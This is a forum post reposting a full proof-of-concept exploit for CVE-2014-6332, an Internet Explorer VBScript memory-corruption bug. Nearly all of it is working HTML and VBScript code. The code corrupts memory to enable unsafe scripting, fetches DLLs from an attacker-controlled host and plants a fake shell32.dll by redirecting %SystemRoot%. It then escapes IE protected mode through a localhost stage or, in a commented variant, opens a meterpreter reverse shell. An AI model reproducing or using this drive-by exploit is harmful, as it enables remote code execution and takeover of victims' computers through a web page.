Jump to content
Nytro

CVE-2014-6332 PoC to get shell or bypass protected mode

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

CVE-2014-6332 PoC to get shell or bypass protected mode

<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

- https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf
- http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
-->
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>

<body>

<script language="javascript">
var oReq;
function getdll(downloadFile)
{
    oReq = new XMLHttpRequest();
    oReq.open("GET", "http://192.168.1.100/"+downloadFile, true);
    oReq.onreadystatechange = handler;
    oReq.send();
}

function handler()
{
    if (oReq.readyState == 4 && oReq.status == 200) {
        OnDownloadDone();
    }
}

function tolocal()
{
    location.href = "http://localhost:5555/stage2.html"
}

</script>

<script language="VBScript">
' local server files to get medium integrity
downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html")
cacheRegex = Array("^ieshell32\[\d\].dll$", "^ielocalserver\[\d\].dll$", "^stage2\[\d\].htm$")
' reverse meterpreter shell files
'downloadFiles = Array("ieshell32.dll", "metp.dll")
'cacheRegex = Array("^ieshell32\[\d\].dll$", "^metp\[\d\].dll$")
Dim cacheFiles(3)

Dim downloadState
Dim pinTime

Dim oFSO
Dim oWS
Dim shell

function FindFile(path, regexFile)
    FindFile = ""
    For Each f in oFSO.GetFolder(path).Files
        If regexFile.Test(f.Name) Then
            FindFile = f.Name
            Exit For
        End If
    Next    
end function

function SearchCache(path, regexFile)
    SearchCache = ""
    For Each fld in oFSO.GetFolder(path).SubFolders
        'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
            filename = FindFile(path & "\" & fld.Name, regexFile)
            If filename <> "" Then
                SearchCache = path & "\" & fld.Name & "\" & filename
                Exit For
            End If
        'End If
    Next
end function

function loaddll()
    On Error Resume Next

    Set wshSystemEnv = oWS.Environment("Process")
    tmpDir = oFSO.GetSpecialFolder(2)

    tmpSysDir = tmpDir & "\System32"
    tmpShellFile = tmpSysDir & "\shell32.dll"
    oFSO.CreateFolder(tmpSysDir)
    oFSO.CopyFile cacheFiles(0), tmpShellFile

    mydllFile = tmpDir & "\" & downloadFiles(1)
    oFSO.CopyFile cacheFiles(1), mydllFile
    wshSystemEnv("MyDllPath") = mydllFile

    If (UBound(downloadFiles) = 2) Then
        stage2File = tmpDir & "\stage2.html"
        oFSO.CopyFile cacheFiles(2), stage2File
        wshSystemEnv("stage2file") = stage2File
    End If

    saveRoot = wshSystemEnv("SystemRoot")
    wshSystemEnv("SaveSystemRoot") = saveRoot
    wshSystemEnv("SystemRoot") = tmpDir
    Set shell = CreateObject("Shell.Application")
    ' have to restore %SystemRoot% in dll, not here

    oFSO.DeleteFile tmpShellFile
    oFSO.DeleteFolder tmpSysDir

    If (UBound(downloadFiles) = 2) Then
        call tolocal()
    End If
end function

Sub OnDownloadDone()
    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
    cacheDir = cacheDir & "\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5"

    Set regexFile = new regexp
    regexFile.Pattern = cacheRegex(downloadState)
    cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
    If cacheFiles(downloadState) = "" Then
        Exit Sub
    End If

    If downloadState = UBound(downloadFiles) Then
        loaddll()
    Else
        downloadState = downloadState + 1
        DoDownload()
    End If
End Sub

Sub DoDownload()
    pinTime = Now
    call getdll(downloadFiles(downloadState))
End Sub

Sub runshell()
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    Set oWS = CreateObject("WScript.Shell")
    downloadState = 0
    DoDownload()
End Sub

</script>

<script language="VBScript">
dim arrX()
dim arrY()

dim asize
dim incsize
dim olapPos

Begin()

function Begin()
    On Error Resume Next
    Init()
    If Exploit() = True Then
        EnableGodMode()
        redim Preserve arrX(asize)
        runshell()
    End If
end function

function Init()
    Randomize()
    asize = 13 + 17*rnd(6)
    incsize = 7 + 3*rnd(5)
end function

function Exploit()
    dim i
    Exploit = False
    For i = 0 To 400
        asize = asize + incsize
        If Trigger() = True Then
            Exploit = True
            Exit For
        End If
    Next
end function

function Trigger()
    On Error Resume Next
    dim typev
    dim ofnumele

    Trigger = False
    olapPos = asize + 2
    ofnumele = asize + &h8000000

    redim Preserve arrX(asize)
    redim arrY(asize)
    redim Preserve arrX(ofnumele)

    typev = 1
    arrY(0) = 1.123456789012345678901234567890

    If (IsObject(arrX(olapPos-1)) = False) Then
        If (VarType(arrX(olapPos-1)) <> 0) Then
            If (IsObject(arrX(olapPos)) = False) Then
                typev = VarType(arrX(olapPos))
            End If
        End If
    End If

    If (typev = &h2f66) Then
        Trigger = True
    Else
        redim Preserve arrX(asize)
    End If
end function

function ReadMemInt(addr)
    arrY(0) = 0
    arrX(olapPos) = addr+4
    arrY(0) = 8
    ReadMemInt = lenb(arrX(olapPos))
end function

function EnableGodMode()
    i = LeakFnAddr()
    i = ReadMemInt(i+8)
    i = ReadMemInt(i+16)

    myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
    arrX(olapPos+2) = myarray
    arrY(2) = 8192 + 12

    EnableGodMode = False
    For k=0 To &h60 step 4
        j = ReadMemInt(i+&h120+k)
        If (j = 14) Then
            arrX(olapPos+2)(i+&h11c+k) = arrY(4)
            EnableGodMode = True
            Exit For
        End If
    Next
end function

sub dummyfn()
end sub

function LeakFnAddr()
    On Error Resume Next
    i = dummyfn
    i = null
    arrY(0) = 0
    arrX(olapPos) = i
    arrY(0) = 3
    LeakFnAddr = arrX(olapPos)
end function
</script>
</body>
</html>

Sursa: https://gist.github.com/worawit/1213febe36aa8331e092

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...